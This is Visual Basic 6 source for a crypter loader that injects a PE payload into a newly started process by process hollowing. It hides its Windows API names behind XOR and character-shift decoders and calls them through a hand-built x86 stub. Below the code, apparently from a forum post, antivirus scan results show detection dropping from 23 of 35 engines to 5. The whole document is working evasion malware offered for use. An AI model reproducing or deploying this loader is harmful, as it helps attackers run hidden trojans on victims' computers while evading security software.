Private Declare Function ZtMGwcllkpaSaER Lib "winmm.dll" (ByVal hMixerObj As Long, pMixerCD As Long, ByVal fdwDetails As Long) As Long
Private Declare Function knfDSLv Lib "USER32" Alias "RegisterWindowMessageA" (ByVal LPString As String) As Long
Private Declare Function AdivFbo Lib "USER32" Alias "LoadCursorFromFileA" (ByVal lpFileName As String) As Long
Private Declare Function GetProcAddress Lib "kernel32" (ByVal qkrvtMeXS As Long, ByVal Sa39iyURB As String) As Long
Private Declare Function pLKmTlQbBbnhywSoM Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function MetOBLjeHJpJO Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function sBCAFdjqUihxADvUj Lib "winmm.dll" (ByVal uPeriod As Long) As Long
Private Declare Function uwQtyLIrEeeFNbCQ Lib "USER32" (ByVal hDC As Long, ByVal xLeft As Long, ByVal yTop As Long, ByVal hIcon As Long, ByVal OutputWidth As Long, ByVal OutputHeight As Long, ByVal iStepIfAniCur As Long, ByVal hbrFlickerFreeDraw As Long, ByVal diFlags As Long) As Long
Private Declare Function rRsDx Lib "USER32" Alias "LoadCursorA" (ByVal hLib As Long, ByVal lngCursorID As Long) As Long

Private Declare Function VRduJQSczuYaGMgodI Lib "SHELL32.DLL" Alias "SHGetFileInfoA" (ByVal pszPath As String, ByVal dwFileAttributes As Long, psfi As Long, ByVal cbFileInfo As Long, ByVal uFlags As Long) As Long
Private Declare Function DHtzGYyxNDGyQA Lib "winmm.dll" Alias "sndPlaySoundA" (ByVal Sound As Long, ByVal lngFlags As Long) As Long
Private Declare Function KzTJAO Lib "winmm.dll" Alias "mciGetErrorStringA" (ByVal ErrorNumber As Long, ByVal ReturnBuffer As String, ByVal ReturnBufferSize As Long) As Long 'BOOL
Private Declare Function HuuVfrSnRqITIFz Lib "STKIT432.DLL" (ByVal lpstrFolderName As String, ByVal lpstrLinkName As String, ByVal lpstrLinkPath As String, ByVal lpstrLinkArgs As String) As Long
Private Declare Function mVgmiuKLhjsPxaqQd Lib "GDI32.DLL" (ByVal hDC As Long, ByVal nIndex As Long) As Long
Private Declare Function LoadLibraryA Lib "kernel32" (ByVal SCgYSjXPN As String) As Long
Private Declare Function tZUUTZJCJoOAQT Lib "USER32" (ByVal hCursor As Long) As Long
Private Declare Function nQvfbPkbQfpYYKxZv Lib "winmm.dll" () As Long
Private Declare Function DUGKlZVPifCYwCyKNcx Lib "USER32" (ByVal hIcon As Long) As Long
Private Declare Function SNrGZtMGwcllkpa Lib "USER32" (ByVal IconOrCursor As Long, ByRef pICONINFO As Long) As Long


' Four module-level variables that are not referenced in the visible code
' (presumably generator filler - confirm), followed by a type whose field layout
' matches the Win32 SECURITY_ATTRIBUTES structure. The type is not referenced in the
' visible code either.
Private ihwBEyUjcMuvRtMWrF As Long
Private eGcbDkCnrSrDvPNjFd As Double
Private SdWlHtEbWACiCIQFkt As String
Private swVbiNaZptynNcUFmo As Byte
Private Type tX1G1gc6e
nLength As Long
lpSecurityDescriptor As Long
bInheritHandle As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches the Win32
' STARTUPINFO structure. It is the startup-info argument of CreateProcessA; only cb
' is filled in by the visible code.
Private BjvWWwGTuPtSjKkypI As Long
Private OwIOKWmCJLUrmQSFYg As Double
Private BvvyAlrAQqpGyqPsXV As Boolean
Private rMCsHRAAmnOXjMfKiB As Currency
Private BwrKHeOYeamDEZbkIp As Date
Private iPVovlSNNMRCuCgHsJ As Currency
Private Type HvWIgrbaI
cb As Long
lpReserved As Long
lpDesktop As Long
lpTitle As Long
dwX As Long
dwY As Long
dwXSize As Long
dwYSize As Long
dwXCountChars As Long
dwYCountChars As Long
dwFillAttribute As Long
dwFlags As Long
wShowWindow As Integer
cbReserved2 As Integer
lpReserved2 As Long
hStdInput As Long
hStdOutput As Long
hStdError As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches the Win32
' PROCESS_INFORMATION structure. The first field (the process-handle slot) carries a
' random name and is what the visible code passes as the target process handle.
Private eJsodwnesDllYLmIVj As Date
Private iUYwmjdysQlKQMYbpL As Currency
Private WgaEUmHaUKpwCngnSe As Integer
Private uwBsRgZJqtOquJToCo As Integer
Private Type Ikr1WTQJc
CE9yvfJTt As Long
hThread As Long
dwProcessId As Long
dwThreadID As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches the x86
' FLOATING_SAVE_AREA structure; embedded as the FloatSave member of the
' thread-context type.
Private bJaMQqQbVnkIdCuqCT As Single
Private DqBYTvweEMChqqpuRY As Integer
Private KXWmpskJYRBjlGinBw As Integer
Private tTTuDQrLqPgHhsmFnK As String
Private FLHSjGHRojNPuCVcSw As String
Private Type rVuaHnLLV
ControlWord As Long
StatusWord As Long
TagWord As Long
ErrorOffset As Long
ErrorSelector As Long
DataOffset As Long
DataSelector As Long
RegisterArea(1 To 80) As Byte
Cr0NpxState As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches the 32-bit x86
' thread CONTEXT structure up to SegSs. The visible code sets ContextFlags on a
' variable of this type.
Private ioyNnmDsynMoUSAoJp As Double
Private jSRFFgoBdvcBSeSQKc As Double
Private yfqvsEVWrsDaHkAgnG As Currency
Private EjefdiTNUwZKaehYwa As Byte
Private plZukbpAiiVIiFSgNf As Date
Private VujgaspMiHNJUXmIJT As Integer
Private Type vQYh9rmTo
ContextFlags As Long

Dr0 As Long
Dr1 As Long
Dr2 As Long
Dr3 As Long
Dr6 As Long
Dr7 As Long

FloatSave As rVuaHnLLV
SegGs As Long
SegFs As Long
SegEs As Long
SegDs As Long
Edi As Long
Esi As Long
Ebx As Long
Edx As Long
Ecx As Long
Eax As Long
Ebp As Long
Eip As Long
SegCs As Long
EFlags As Long
Esp As Long
SegSs As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches IMAGE_DOS_HEADER
' (64 bytes). The visible code copies the first 64 bytes of the payload buffer into
' it and reads only e_lfanew; e_magic is never checked.
Private jEXRHmuytkdkPbbquw As Long
Private OdWGnqLnrGQllYAVUv As Integer
Private yhlLlvqJGdXPMXoDYM As Double
Private tnRTAUZhXDMMLPmtBf As Long
Private rHLOGetmWEHbEIWTCP As Long
Private oQYkNgMjCbCNHZJfPa As Integer
Private Type IG4wyJbPZ
e_magic As Integer
e_cblp As Integer
e_cp As Integer
e_crlc As Integer
e_cparhdr As Integer
e_minalloc As Integer
e_maxalloc As Integer
e_ss As Integer
e_sp As Integer
e_csum As Integer
e_ip As Integer
e_cs As Integer
e_lfarlc As Integer
e_ovno As Integer
e_res(0 To 3) As Integer
e_oemid As Integer
e_oeminfo As Integer
e_res2(0 To 9) As Integer
e_lfanew As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches IMAGE_FILE_HEADER.
' The visible code reads NumberOfSections from it to bound the section-copy loop.
Private uDEOlgKLrwRZPupqot As Integer
Private lsJkjAprjJlQOvkGym As Boolean
Private LttggIQdFYEctGtrlE As Boolean
Private XHSYUfvwTUeCiMbIPh As Long
Private Type yDQ4fPIlY
Machine As Integer
NumberOfSections As Integer
TimeDateStamp As Long
PointerToSymbolTable As Long
NumberOfSymbols As Long
SizeOfOptionalHeader As Integer
characteristics As Integer
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches
' IMAGE_DATA_DIRECTORY; used only as the element type of the optional header's
' DataDirectory array.
Private DBGqkrVvhwCFyVwdNJ As String
Private SINXGGsfGcpEkDosSH As Boolean
Private wQNjGekgruKfgqAuYo As Byte
Private buoeKSTRWIBImOSVNl As Boolean
Private tdLOiLPdnJWJyXsrUC As Date
Private Type opSQywttF
VirtualAddress As Long
Size As Long
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches the 32-bit
' IMAGE_OPTIONAL_HEADER. The visible code reads ImageBase, SizeOfImage and
' SizeOfHeaders from it; Magic is never checked.
Private JUOgdBWumiuMayjsRL As Long
Private qXrvFuajjimKRYDPPe As Single
Private ldCRKtbebftqZmMMny As Byte
Private kEjHZZkevgDmwDALcq As Boolean
Private Type nOr6mWzig
Magic As Integer
MajorLinkerVersion As Byte
MinorLinkerVersion As Byte
SizeOfCode As Long
SizeOfInitializedData As Long
SizeOfUnitializedData As Long
AddressOfEntryPoint As Long
BaseOfCode As Long
BaseOfData As Long
ImageBase As Long
SectionAlignment As Long
FileAlignment As Long
MajorOperatingSystemVersion As Integer
MinorOperatingSystemVersion As Integer
MajorImageVersion As Integer
MinorImageVersion As Integer
MajorSubsystemVersion As Integer
MinorSubsystemVersion As Integer
W32VersionValue As Long
SizeOfImage As Long
SizeOfHeaders As Long
CheckSum As Long
SubSystem As Integer
DllCharacteristics As Integer
SizeOfStackReserve As Long
SizeOfStackCommit As Long
SizeOfHeapReserve As Long
SizeOfHeapCommit As Long
LoaderFlags As Long
NumberOfRvaAndSizes As Long
DataDirectory(0 To 15) As opSQywttF
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches the 32-bit
' IMAGE_NT_HEADERS. The visible code fills it with a fixed 248-byte copy taken at
' offset e_lfanew of the payload; Signature is never checked.
Private EhiPVovmSNOMRCJQgI As Byte
Private XNPHgJnlUIdTKYiRRE As Byte
Private fnBcybARdRPJbYuepy As Long
Private DUVqrCZGjfmFNDidec As Single
Private Type zHimHxdyE
Signature As Long
FileHeader As yDQ4fPIlY
OptionalHeader As nOr6mWzig
End Type

' Module-level variables not referenced in the visible code (presumably generator
' filler - confirm), followed by a type whose field layout matches
' IMAGE_SECTION_HEADER. The visible code reads VirtualAddress, PointerToRawData and
' SizeOfRawData for each section and uses them unchecked as offsets and lengths.
Private SteuBsSuZKGtOFyKUD As Boolean
Private pcDZlAhlpPDBuNKgDb As Single
Private dorHcdnvrVkEXqlaGP As Date
Private OTEwFiyuLPRJiwpaIK As Integer
Private Type guWZ6IUxp
SecName As String * 8
VirtualSize As Long
VirtualAddress As Long
SizeOfRawData As Long
PointerToRawData As Long
PointerToRelocations As Long
PointerToLinenumbers As Long
NumberOfRelocations As Integer
NumberOfLinenumbers As Integer
characteristics As Long
End Type


' Calls an exported function chosen at run time: ACzbFfGhs from library qOLqmwZVA,
' with the values in TLEEGE3BB as its arguments.
'   qOLqmwZVA - library name handed to LoadLibraryA
'   ACzbFfGhs - export name handed to GetProcAddress
'   TLEEGE3BB - arguments for the target; each is converted to a 32-bit Long
' Returns the value CallWindowProcA returns, or 0 (never assigned) when
' GetProcAddress yields 0.
' The call is made through a short x86 stub assembled in a local byte array and run
' by passing the array's address to CallWindowProcA as the procedure to call, so the
' APIs used by callers never appear in a Declare statement.
' NOTE(review): the stub is executed from an ordinary data buffer; this presumably
' relies on DEP not being enforced for the process - confirm.
Public Function u7tGsr9W3(ByVal qOLqmwZVA As String, ByVal ACzbFfGhs As String, ParamArray TLEEGE3BB()) As Long
Dim CUKQL As Long, zFt3quxBV(&HEC00& - 1) As Byte, HAB As Long, WMJGLUQ As Long

WMJGLUQ = GetProcAddress(LoadLibraryA(qOLqmwZVA), ACzbFfGhs)
If WMJGLUQ = 0 Then Exit Function

' CUKQL is the write cursor into the stub buffer.
CUKQL = VarPtr(zFt3quxBV(0))
' Bytes 58 59 59 59 59 50: pop the return address into eax, pop four more stack
' values (the four extra CallWindowProcA arguments) into ecx, push the return address back.
RtlMoveMemory ByVal CUKQL, &H59595958, &H4: CUKQL = CUKQL + 4
RtlMoveMemory ByVal CUKQL, &H5059, &H2: CUKQL = CUKQL + 2
' One "push imm32" (byte 68) per argument, last argument first.
For HAB = UBound(TLEEGE3BB) To 0 Step -1
RtlMoveMemory ByVal CUKQL, &H68, &H1: CUKQL = CUKQL + 1
RtlMoveMemory ByVal CUKQL, CLng(TLEEGE3BB(HAB)), &H4: CUKQL = CUKQL + 4
Next
' Byte E8: relative call; the displacement is the target minus the address that follows the 4-byte operand.
RtlMoveMemory ByVal CUKQL, &HE8, &H1: CUKQL = CUKQL + 1
RtlMoveMemory ByVal CUKQL, WMJGLUQ - CUKQL - 4, &H4: CUKQL = CUKQL + 4
' Byte C3: ret.
RtlMoveMemory ByVal CUKQL, &HC3, &H1: CUKQL = CUKQL + 1
u7tGsr9W3 = CallWindowProcA(VarPtr(zFt3quxBV(0)), 0, 0, 0, 0)
End Function

' String decoder: XORs each character of iNLI3ostx with a character of the key
' YIagFy1Sq, repeating the key as often as needed, and returns the resulting string.
'   iNLI3ostx - encoded text
'   YIagFy1Sq - key; an empty key makes the Mod operation fail with a division-by-zero error
' In the visible code it decodes the library and function names handed to u7tGsr9W3,
' so those names never appear as plain strings.
Public Function GCcQ9b7nT(ByVal iNLI3ostx As String, ByVal YIagFy1Sq As String) As String
Dim DELHfVCj8 As Long

For DELHfVCj8 = 1 To Len(iNLI3ostx)
' Key position is (index Mod key length), with a remainder of 0 mapped to the last
' key character because Mid is 1-based.
GCcQ9b7nT = GCcQ9b7nT & Chr(Asc(Mid(YIagFy1Sq, IIf(DELHfVCj8 Mod Len(YIagFy1Sq) <> 0, DELHfVCj8 Mod Len(YIagFy1Sq), Len(YIagFy1Sq)), 1)) Xor Asc(Mid(iNLI3ostx, DELHfVCj8, 1)))
Next DELHfVCj8
End Function

Public Sub nJLJ0h51B(ByVal gAjHv5BEo As String, ByRef GelPTlshh() As Byte, LY7YFef3i As String)
Dim Puq626fXT As Long, WcURpueyC As IG4wyJbPZ, dxNCenpxr As zHimHxdyE, VBzOQVQxf As guWZ6IUxp
Dim ptLvXfllO As HvWIgrbaI, cQdlVdwtG As Ikr1WTQJc, sGbh6tdbF As vQYh9rmTo

ptLvXfllO.cb = Len(ptLvXfllO)
RtlMoveMemory WcURpueyC, GelPTlshh(0), 64
RtlMoveMemory dxNCenpxr, GelPTlshh(WcURpueyC.e_lfanew), 248

CreateProcessA gAjHv5BEo, kMIvzyLCQ(StrReverse(Chr$(41)), StrReverse(Chr$(57))) & LY7YFef3i, 0, 0, False, bTQl9oDeY, 0, 0, ptLvXfllO, cQdlVdwtG
u7tGsr9W3 GCcQ9b7nT(Chr(56) & Chr(58) & Chr(40) & Chr(39) & Chr(35), kMIvzyLCQ(StrReverse(Chr$(92) & Chr$(72) _
& Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) & Chr$(85) _
& Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) & Chr$(78) _
& Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) & Chr$(73) _
& Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) & Chr$(80) _
& Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(24) & Chr(58) & Chr(25) & Chr(37) & Chr(34) & Chr(34) & Chr(37) & Chr(14) & Chr(46) & Chr(53) & Chr(56) & Chr(10) & Chr(54) & Chr(29) & Chr(34) & Chr(33) & Chr(37) & Chr(34) & Chr(62) & Chr(57), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(0) & Chr(39) & Chr(62) & Chr(63) & Chr(58) & Chr(34) & Chr(57) & Chr(25) & Chr(43) & Chr(60) & Chr(32) & Chr(38) & Chr(21) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.CE9yvfJTt, dxNCenpxr.OptionalHeader.ImageBase, dxNCenpxr.OptionalHeader.SizeOfImage, E4r2NPXmu Or EQIAtwHT0, mvUSFCqYB
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase, GelPTlshh(0), dxNCenpxr.OptionalHeader.SizeOfHeaders, 0

For Puq626fXT = 0 To dxNCenpxr.FileHeader.NumberOfSections - 1
RtlMoveMemory VBzOQVQxf, GelPTlshh(WcURpueyC.e_lfanew + 248 + 40 * Puq626fXT), Len(VBzOQVQxf)
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal dxNCenpxr.OptionalHeader.ImageBase + VBzOQVQxf.VirtualAddress, GelPTlshh(VBzOQVQxf.PointerToRawData), VBzOQVQxf.SizeOfRawData, 0
Next Puq626fXT

sGbh6tdbF.ContextFlags = oHlUFbB7c
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(17) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
WriteProcessMemory cQdlVdwtG.CE9yvfJTt, ByVal sGbh6tdbF.Ebx + 8, dxNCenpxr.OptionalHeader.ImageBase, 4, 0
sGbh6tdbF.Eax = dxNCenpxr.OptionalHeader.ImageBase + dxNCenpxr.OptionalHeader.AddressOfEntryPoint
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(5) & Chr(43) & Chr(56) & Chr(31) & Chr(39) & Chr(49) & Chr(48) & Chr(57) & Chr(35) & Chr(19) & Chr(32) & Chr(43) & Chr(36) & Chr(43) & Chr(63) & Chr(54), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread, VarPtr(sGbh6tdbF)
u7tGsr9W3 GCcQ9b7nT(Chr(61) & Chr(43) & Chr(62) & Chr(37) & Chr(42) & Chr(47) & Chr(102) & Chr(106), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), GCcQ9b7nT(Chr(4) & Chr(43) & Chr(63) & Chr(62) & Chr(34) & Chr(38) & Chr(1) & Chr(48) & Chr(53) & Chr(53) & Chr(46) & Chr(33), kMIvzyLCQ(StrReverse(Chr$(92) _
& Chr$(72) & Chr$(70) & Chr$(92) & Chr$(78) & Chr$(89) & Chr$(75) & Chr$(73) & Chr$(82) & Chr$(79) _
& Chr$(85) & Chr$(72) & Chr$(85) & Chr$(87) & Chr$(80) & Chr$(88) & Chr$(80) & Chr$(93) & Chr$(92) _
& Chr$(78) & Chr$(91) & Chr$(85) & Chr$(79) & Chr$(85) & Chr$(70) & Chr$(75) & Chr$(82) & Chr$(84) _
& Chr$(73) & Chr$(83) & Chr$(84) & Chr$(75) & Chr$(92) & Chr$(89) & Chr$(71) & Chr$(83) & Chr$(79) _
& Chr$(80) & Chr$(82) & Chr$(90)), StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(StrReverse(Chr$(52) _
)))))))))))), cQdlVdwtG.hThread
End Sub

' String de-obfuscation helper: subtracts a fixed offset from the character
' code of every character in the input and returns the resulting string.
'
' Parameters:
'   FhbXF8MVH - the encoded string. No ByVal is given, so VB6 passes it by
'               reference and the Mid statement below rewrites it in place.
'   lPCqbkM9x - the offset subtracted from each character code.
' Returns:
'   The shifted string. No return type is declared, so it comes back as a Variant.
'
' NOTE(review): in the visible call sites the input is a StrReverse'd run of
' Chr$() constants and the offset is the string "4" (Chr$(52) wrapped in an
' even number of StrReverse calls, coerced to Integer). The decoded value is
' handed as the second argument to GCcQ9b7nT, which is not shown here.
' The point of this layering is that no readable string constant is left in
' the binary for a static scanner to match; for analysis, the long
' Chr$/StrReverse chains are themselves a recognisable pattern.
Public Function kMIvzyLCQ(FhbXF8MVH As String, lPCqbkM9x As Integer)
    Dim kDFZMkl0Q As Integer
   
    ' Walk the string one character at a time (VB6 strings are 1-based).
    For kDFZMkl0Q = 1 To Len(FhbXF8MVH)
        ' Replace the character with the one whose code is lower by the offset.
        ' Chr raises a run-time error if the result falls below 0; nothing here guards against that.
        Mid(FhbXF8MVH, kDFZMkl0Q, 1) = Chr(Asc(Mid(FhbXF8MVH, kDFZMkl0Q, 1)) - lPCqbkM9x)
    Next kDFZMkl0Q
    kMIvzyLCQ = FhbXF8MVH
End Function


Antes:

Date and Time: 10/11/2012 3:45:23 P
File Name: sPrueba1.exe
File Size: 16384 Bytes
MD5: 672d19493b2faeb7cf8cf3ea64f51890
SHA1: e149fa00bb18b624fd51d13cdc8c8d7cb58035e8
Detection: 23 of 35 (66%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Win32:Inject-ATA [Trj]
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Gen:Trojan.Heur.ZGY.8
VirusBuster Internet Security - Trojan.VBInject.Gen.7
Clam Antivirus - Clean!
COMODO Internet Security - Clean!
Dr.Web - Trojan.VbCrypt.89
eTrust-Vet - Win32/VBInject.D!generic
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Gen:Trojan.Heur.ZGY.8
G Data - Gen:Trojan.Heur.ZGY.8, Win32:Inject-ATA [Trj]
IKARUS Security - Virus.Win32.VBInject
Kaspersky Antivirus - Worm.Win32.VBNA.b
McAfee - Clean!
MS Security Essentials - VirTool:Win32/VBInject.RT
ESET NOD32 - Trojan.Win32/Injector.WZ
Norman - W32/VBInject.YG
Norton Antivirus - Clean!
Panda Security - Clean!
A-Squared - Virus.Win32.VBInject!IK
Quick Heal Antivirus - Clean!
Rising Antivirus - Clean!
Solo Antivirus - Clean!
Sophos - Mal/VBInject-AK
Trend Micro Internet Security - Clean!
VBA32 Antivirus - infected Trojan.VB.Levelup
Vexira Antivirus - Trojan.VBInject.Gen.7
Zoner AntiVirus - Clean!
Ad-Aware - VirTool.Win32.VBInject.gen.bp (v)


Ahora:

Date and Time: 10/11/2012 3:53:27 P
File Name: sPrueba4.exe
File Size: 24576 Bytes
MD5: 847f8117c78d7e42d06b3ec11f4462f5
SHA1: ee1263d4edfab9f052f148ae6a76428cfcef8969
Detection: 5 of 35 (14%)
Status: INFECTED

AVG Free - Clean!
ArcaVir - Clean!
Avast 5 - Clean!
AntiVir (Avira) - TR/Dropper.Gen
BitDefender - Clean!
VirusBuster Internet Security - Clean!
Clam Antivirus - Clean!
COMODO Internet Security - TrojWare.Win32.Agent.angn@220045096
Dr.Web - Clean!
eTrust-Vet - Clean!
F-PROT Antivirus - W32/VBInject.CC.gen!Eldorado (generic, not disinfectable)
F-Secure Internet Security - Clean!
G Data - Clean!
IKARUS Security - Clean!
